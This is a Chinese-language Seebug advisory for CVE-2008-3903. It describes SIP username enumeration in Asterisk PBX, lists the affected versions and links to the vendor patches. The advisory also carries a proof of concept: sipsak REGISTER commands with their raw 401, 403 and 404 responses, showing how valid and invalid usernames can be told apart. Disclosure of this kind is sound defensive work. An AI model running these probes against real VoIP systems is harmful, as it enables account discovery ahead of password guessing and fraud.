Asterisk认证SIP响应用户名枚举漏洞

2009-04-04T00:00:00
ID SSV:4993
Type seebug
Reporter Root
Modified 2009-04-04T00:00:00

Description

BUGTRAQ ID: 34353 CVE(CAN) ID: CVE-2008-3903

Asterisk是开放源码的软件PBX,支持各种VoIP协议和设备。

如果启用了Digest认证的话,Asterisk PBX对登录期间所尝试的有效和无效SIP用户名会返回不同的响应,远程攻击者可以通过暴力猜测枚举出有效的用户名。

Asterisk Asterisk 1.6.0.x Asterisk Asterisk 1.4.x Asterisk Asterisk 1.2.x Asterisk Business Edition C.2.x.x Asterisk Business Edition C.1.x.x Asterisk Business Edition B.x.x Asterisk s800i 1.3.x Asterisk


目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=http://downloads.digium.com/pub/asa/AST-2009-003-1.2.diff.txt target=_blank rel=external nofollow>http://downloads.digium.com/pub/asa/AST-2009-003-1.2.diff.txt</a> <a href=http://downloads.digium.com/pub/asa/AST-2009-003-1.4.diff.txt target=_blank rel=external nofollow>http://downloads.digium.com/pub/asa/AST-2009-003-1.4.diff.txt</a> <a href=http://downloads.digium.com/pub/asa/AST-2009-003-1.6.0.diff.txt target=_blank rel=external nofollow>http://downloads.digium.com/pub/asa/AST-2009-003-1.6.0.diff.txt</a> <a href=http://downloads.digium.com/pub/asa/AST-2009-003-1.6.1.diff.txt target=_blank rel=external nofollow>http://downloads.digium.com/pub/asa/AST-2009-003-1.6.1.diff.txt</a>

                                        
                                            
                                                在启用了alwaysauthreject的Asterisk 1.4上:

无效口令的无效用户

% sipsak-0.9.6/sipsak -IU -a testx -s sip:testX@asteriskbox:5060

SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.199:63013;branch=z9hG4bK.5db5cc72;alias;received=192.168.1.199;rport=48834
From: sip:testX@192.168.8.234:5060;tag=550fcb06
To: sip:testX@192.168.8.234:5060;tag=as49ef5a0f
Call-ID: 1427098374@192.168.1.199
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
WWW-Authenticate: Digest algorithm=MD5, realm=”asterisk”, nonce=”70f69171″
Content-Length: 0

无效口令的有效用户

% sipsak-0.9.6/sipsak -IU -a test -s sip:test@asteriskbox:5060

SIP/2.0 403 Forbidden (Bad auth)
Via: SIP/2.0/UDP 192.168.111.1:64426;branch=z9hG4bK.53e7c9a7;alias;received=192.168.1.199;rport=40966
From: sip:test@192.168.8.234:5060;tag=4e3b4edd
To: sip:test@192.168.8.234:5060;tag=as305009f4
Call-ID: 1312509661@192.168.111.1
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0

在禁用了alwaysauthreject的Asterisk上:

无效口令的无效用户

% sipsak-0.9.6/sipsak -IU -a testx -s sip:testX@asteriskbox:5060

SIP/2.0 404 Not found
Via: SIP/2.0/UDP 192.168.111.1:62508;branch=z9hG4bK.37dcbfcf;alias;received=192.168.1.199;rport=37469
From: sip:testX@192.168.8.234:5060;tag=5596ae2f
To: sip:testX@192.168.8.234:5060;tag=as5620a72f
Call-ID: 1435938351@192.168.111.1
CSeq: 1 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0

无效口令的有效用户

% sipsak-0.9.6/sipsak -IU -a testx -s sip:test@asteriskbox:5060

SIP/2.0 403 Forbidden (Bad auth)
Via: SIP/2.0/UDP 192.168.1.199:62607;branch=z9hG4bK.1b938cca;alias;received=192.168.1.199;rport=35572
From: sip:test@192.168.8.234:5060;tag=55aaf11b
To: sip:test@192.168.8.234:5060;tag=as4e3f230d
Call-ID: 1437266203@192.168.1.199
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0